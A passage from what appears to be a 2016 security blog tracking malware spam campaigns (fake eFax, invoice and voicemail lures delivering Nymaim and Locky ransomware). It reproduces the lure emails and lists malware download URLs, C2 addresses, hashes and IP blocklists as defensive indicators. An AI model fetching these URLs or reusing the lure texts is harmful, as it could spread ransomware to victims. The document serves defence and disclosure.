91.142.90.61/checkupdate (Miran, Russia)
195.19.192.99/checkupdate (OOO EkaComp, Russia)


Recommended blocklist:
185.82.217.28
91.142.90.61
195.19.192.99




Tuesday, 29 November 2016

Fake eFax spam uses hacked Sharepoint to spread malware

This fake fax leads to a malicious ZIP file:

From:    eFax [message@inbound-efax.org]
Date:    29 November 2016 at 16:01
Subject:    eFax message from "61 2 97855412" - 2 page(s)


Fax Message

You have received a 2 page fax at 11/29/2016 5:01:13 PM.

* The reference number for this fax is syd1_did12-5405183509-083357256-5.

Click here to view this fax message.

Please visit www.efax.com/en/online_fax_FAQ if you have any questions regarding this message or your service.

Thank you for using the eFax service!
Home     Contact     Login
Powered by j2

© 2012 j2 Global Communications, Inc. All rights reserved.
eFax® is a registered trademark of j2 Global Communications, Inc.

This account is subject to the terms listed in the eFax® Customer Agreement.


The link in the email goes to a hacked Sharepoint account, in this case:

https://supremeselfstorage-my.sharepoint.com/personal/andrew_supremeselfstorage_com_au/_layouts/15/guestaccess.aspx?guestaccesstoken=GTQPc%2brKLAsKHba4nXtvl0hXrBsUmCUxoYGuu9msk0U%3d&docid=0c4b96dfd3319496a8feb1a56d88de679&rev=1

It seems to belong to a legitimate company, but maybe one that has suffered an Office 365 compromise.

The ZIP file it leads to is named Fax_11292016.zip (there may be other versions) containing two identical scripts named

Fax_11292016_page1.js
Fax_11292016_page2.js

that look like this. Hybrid Analysis of the script indicates this is Nymaim, downloading a component from:

siliguribarassociation.org/images/staffs/documetns.png

A malicious EXE is dropped with an MD5 of bdf952b2388bf429097b771746395a4c and a detection rate of 9/56. The malware then phones home to:

stengeling.com/20aml/index.php

The domain stengeling.com appears to have been created for this malware and has anonymous registration details. It is apparently multihomed on the following IPs:

4.77.129.110
18.17.224.92
31.209.107.100
37.15.90.12
43.132.208.7
45.249.111.213
52.61.200.235
61.25.216.8
67.25.164.206
74.174.194.169
88.214.198.162
92.74.29.236
111.241.115.90
115.249.171.24
119.71.196.177
135.55.94.211
143.99.241.18
147.89.60.135
156.180.11.60
162.74.9.51
168.227.171.254
176.114.21.171
184.131.179.44
207.77.174.212

Each of those IPs appears to be a hacked legitimate host, with a high turnover of IPs. Those IPs appear to be associated with the following domains that may be worth blocking:

butestsis.com
sievecnda.com
specsotch.com
crileliste.com
stengeling.com


Malware spam: "Please find attached a XLS Invoice 378296" / creditcontrol@somecompany.com / Ansell Lighting

This fake financial spam comes with a malicious attachment, purporting to come from Ansell Lighting:

Subject:     Please find attached a XLS Invoice 378296
From:     creditcontrol@potomachealthcare.com (creditcontrol@potomachealthcare.com)
Date:     Tuesday, 29 November 2016, 10:32

The original message was not completely plain text, and may be unsafe to
open with some email clients; in particular, it may contain a virus,
or confirm that your address can receive spam.  If you wish to view
it, it may be safer to save it to a file and open it with an editor.

Please find attached your Invoice for Goods/Services recently delivered. If you have any questions, then pleasedo not hesitate in contacting us.Karen Lightfoot -Credit Controller, Ansell Lighting, Unit 6B, Stonecross Industrial Park, Yew Tree Way, WA3 3JD. Tel: +44 (0)5216 154 830 Fax: +44 (0)5216 154 830

The email comes from a random creditcontrol@something email address. Attached is a malicious Excel file with a name such as INVOICE.TAM_378296_20161129_886C9EAB6.xls.

My usual reliable source says that the various versions of Excel spreadsheet download a component form one of the following locations:

ayurvedic.by/087gbdv4
pregnancysquare.com/087gbdv4
qiqi-store.com/087gbdv4
roberttrocina.com/087gbdv4
satherm.pt/087gbdv4
sayvir.com/087gbdv4
secotral.fr/087gbdv4
semeystvo.com.ua/087gbdv4
spookmedia.nl/087gbdv4
sp-tulun.ru/087gbdv4
stocktradex.com/087gbdv4
swkitchens.com.au/087gbdv4
thegarageteam.gr/087gbdv4
tyfastener.com/087gbdv4

The Hybrid Analysis shows that this is Locky ransomware, phoning home to:

185.115.140.210/information.cgi [hostname: nikita.grachev.81.example.com] (Megaserver LLC, Russia)
213.32.90.193/information.cgi [hostname:  sbg.13.vds.abcvg.ovh] (OVH, France)
95.213.195.123/information.cgi (Selectel SPb, Russia)


A DLL is dropped with an MD5 of b46f0fcb0f962f41b5b43725b440dabb and a VirusTotal detection rate of 11/57.

Recommended blocklist:
185.115.140.210
213.32.90.193
95.213.195.123

Friday, 25 November 2016

Malware spam: [Vigor2820 Series] New voice mail message from 014xxxxxxxx on %date%

This fake voicemail spam leads to Locky ransomware and appears to come from within the victim's own domain, but this is just a simple forgery.

Subject:     [Vigor2820 Series] New voice mail message from 01435773591 on 2016/11/25 18:29:39
From:     voicemail@victimdomain.tld
To:     victim@victimdomain.tld
Date:     Friday, 25 November 2016, 12:58

Dear webmaster :
    There is a message for you from 01435773591, on 2016/11/25 18:29:39 .
You might want to check it when you get a chance.Thanks!
The number in the message will vary, but is consistent throughout. Attached is a ZIP file referencing the same number, e.g. Message_from_01435773591.wav.zip which contains a malicious Javascript that looks like this.

This Malwr analysis shows behaviour consistent with Locky ransomware. My usual source tells me that all the download locations for this campaign are:

asrcargo.ru/yr387n3
easylation.com/yr387n3
jackybrith.net/yr387n3
namicg.com/yr387n3
nxarab.net/yr387n3
oyasinsaat.com.tr/yr387n3
pesaroeventi.it/yr387n3
plast-chem.com.pl/yr387n3
pornolartv.net/yr387n3
portalkerjaya.com/yr387n3
premierpromotions.co.uk/yr387n3
prizor.net/yr387n3
prongai.com/yr387n3
pulse-tv.net/yr387n3
puttechnologies.com/yr387n3
reginaautoauction.com/yr387n3
regionalclaimsrecovery.com/yr387n3
richcity.net/yr387n3
right-livelihoods.org/yr387n3
riyuegu.net/yr387n3
rooana.com/yr387n3
ruchengfcw.com/yr387n3
ruwechat.ru/yr387n3
ryrszs.com/yr387n3
sabinemerz.nl/yr387n3
saintsraw.com/yr387n3
sallymills.com/yr387n3
satherm.pt/yr387n3
sayvir.com/yr387n3
semeystvo.com.ua/yr387n3
setoxy.com/yr387n3
shenzhensh.com/yr387n3
shydnt.com/yr387n3
sienaert.org/yr387n3
signumtte.net/yr387n3
siken3d.com/yr387n3
sineria.com/yr387n3
sinmotor.com/yr387n3
sipho.es/yr387n3
skrzeczkowska.com/yr387n3
songpulatex.com/yr387n3
soonmarketing.com/yr387n3
sp-tulun.ru/yr387n3
square100.com/yr387n3
sreekrishnatemple.com/yr387n3
stamperia.pl/yr387n3
stevetoulch.com/yr387n3
stomatolog-implant.ro/yr387n3
sujiaotuoban.com/yr387n3
sunekitty.com/yr387n3
supplyglassess.com/yr387n3
swkitchens.com.au/yr387n3
sydayont.com/yr387n3
tarasarl.com/yr387n3
tehrankhabar.ir/yr387n3
thegarageteam.gr/yr387n3
theoneworld.in/yr387n3
thoraxcenter.ru/yr387n3
tingfenglou.orgfree.com/yr387n3
tolga-tosun.com/yr387n3
trebleimp.com/yr387n3
tyfastener.com/yr387n3
unimarket.ch/yr387n3
uzmanfren.com.tr/yr387n3
vanaken.nu/yr387n3
velolenta.com/yr387n3
videobandnaardvd.com/yr387n3
vmeste-hudeem.ru/yr387n3

The C2s to block are the same as here, namely:

185.118.167.144/information.cgi [hostname: bogdankarpenko1998.pserver.ru] (Chelyabinsk-Signal, Russia)
91.142.90.55/information.cgi (Miran, Russia)


Recommended blocklist:
185.118.167.144
91.142.90.55





Malware spam: "Important Information" leads to Locky

This spam leads to Locky ransomware:

Subject:     Important Information
From:     Etta Figueroa
Date:     Friday, 25 November 2016, 10:28

Dear [redacted], your payment was not processed due to the problem with credentials.
Payment details are in the attached document.

Please check it out as soon as possible.
The name of the sender varies. Attached is a ZIP file beginning with payment_ and then the first part of the victim's email address.

This analysis comes from my trusted usual source (thank you!). It contains a randomly-named malicious javascript that downloads a component from one of the following locations:

agamaflop.net/6mhcounvr
agamaflop.net/kvlj0
agamaflop.net/poiloazz
agamaflop.net/pvva9uxg3f
facerecognition.com.ba/gyqjnk
hnsdedu.net/9l27sq5hcj
imckart.com/vpggfsdc
inedinburgh.com/0fngc
inspire-consultants.com.my/1d9by
internationalsaws.it/z4xfmsb7
itrechtsanwalt.at/41k0ye7wk
jreeda.w8w.pl/buhj9
jsharvie.com/zoopyji
jsydjc.com/xfsxwi
jyxiangqin.com/wkpm9nwpru
karayurt.nl/4edqluaffx
kreanova.fr/xiczr
lp.shtoryfactura.ru/ckwvbkks
malamalamak9.net/xbrfr
mandsong.com/3dow6hd2
mandsong.com/6uwkeev5ht
mandsong.com/9civ9crw
mandsong.com/di9i5xie
mervereklam.com.tr/9obbe4
microcontroller-cafe.com/1ssyys
montazh5.ru/7eerbjgbjj
muffben.net/5pctik
muffben.net/dyixm8h6x
muffben.net/etfsc5g9
muffben.net/n86rv07wep
pivno.com/l828a3ny
project-group.pro/91wvhx2ei7
puttechnologies.com/k0ncwuajq
repka.eu/tg2cyp
rerda.com/cqmgybvcf
restauranttajmahal.ca/opylmin
ripalknurl.net/3jl4ewks
ripalknurl.net/e7u7dsirr
ripalknurl.net/rnxp9u
ripalknurl.net/rwznknsrm4
rokumedia.de/b66b634w
ruangmobil.com/aykz8o5zzj
rz218.com/is387c6h
saleedu.com/n4ykvsw3h
sansjan.net/gpcef
satthachkhe.vn/oecdiyyxpz
sgadoutdo.net/0bvwbh
sgadoutdo.net/flvnz
sgadoutdo.net/ougezzqzf
sgadoutdo.net/zyxird
shomesofa.com/gidg3gpe
signdepot.com.au/nj5eq
simtecs.net/dubvr1ic
sitivisibili.it/qyebiv2oa2
slife.pt/gcuwpyu
slut-land.com/qjqxbo2n
sonajp.com/aklky4epuq
soulchance.com/jezrfbp
spb-gruz.ru/mhdxe
starovencleaning.co.uk/txre3i
stservis14.ru/fnyyzvd
sunfriends.nl/ppayh4
svegev.ru/gxl013km34
sxxcjt.com/kmgppa4zj4
sxxcjt.com/ntcjqde8
szycfj.com/egej4hc
tasct.ru/gmwpep
templeofrefuge.net/s74uwv4l
thenomadhostel.com/iahepa
thinx.net/rkp2tpxlrg
todos.com.au/a2rjocg6
tokomuslim354.com/dnnvxm6r
tuurbo.be/g5es0jxs6q
tx318.com/sbg12g0d4
use-inc.tv/apzwj5ak4
vanks.cl/plby8w55
vanniersen.nl/rxbtadzgo
veritasresults.com/hpxw6g
vesan.info/dvwsp8v3f
vitreus.nl/hlap29

The malware then phones home to:

213.32.66.16/information.cgi (OVH, France)
89.108.118.180/information.cgi (Datalogika / Agava, Russia)
91.201.42.83/information.cgi [hostname: aportom.com] (RuWeb, Russia)


Recommended blocklist:
213.32.66.16
89.108.118.180
91.201.42.83



Moar Locky 2016-11-25

This data comes from my trusted usual source, so far I have only seen a single example.

This morning's spam run has a subject with one of the following words:

DOC
DOCUMENT
FAX
IMG
LABEL
ORD
PHOTO
PIC
SCAN
SHEET

..plus a four digit random number. Attached is a ZIP file with a name mating the subject, containing a randomly-named malicious javascript that attempts to download a component from one of the following locations:

jackybrith.net/yr387n3
premierpromotions.co.uk/yr387n3
prongai.com/yr387n3
right-livelihoods.org/yr387n3
ryrszs.com/yr387n3
semeystvo.com.ua/yr387n3
signumtte.net/yr387n3
supplyglassess.com/yr387n3
sydayont.com/yr387n3
tehrankhabar.ir/yr387n3
thegarageteam.gr/yr387n3
trebleimp.com/yr387n3
uzmanfren.com.tr/yr387n3
velolenta.com/yr387n3
videobandnaardvd.com/yr387n3
vmeste-hudeem.ru/yr387n3

The payload is Locky ransomware, phoning home to:

185.118.167.144/information.cgi [hostname: bogdankarpenko1998.pserver.ru] (Chelyabinsk-Signal, Russia)
91.142.90.55/information.cgi (Miran, Russia)


Recommended blocklist:
185.118.167.144
91.142.90.55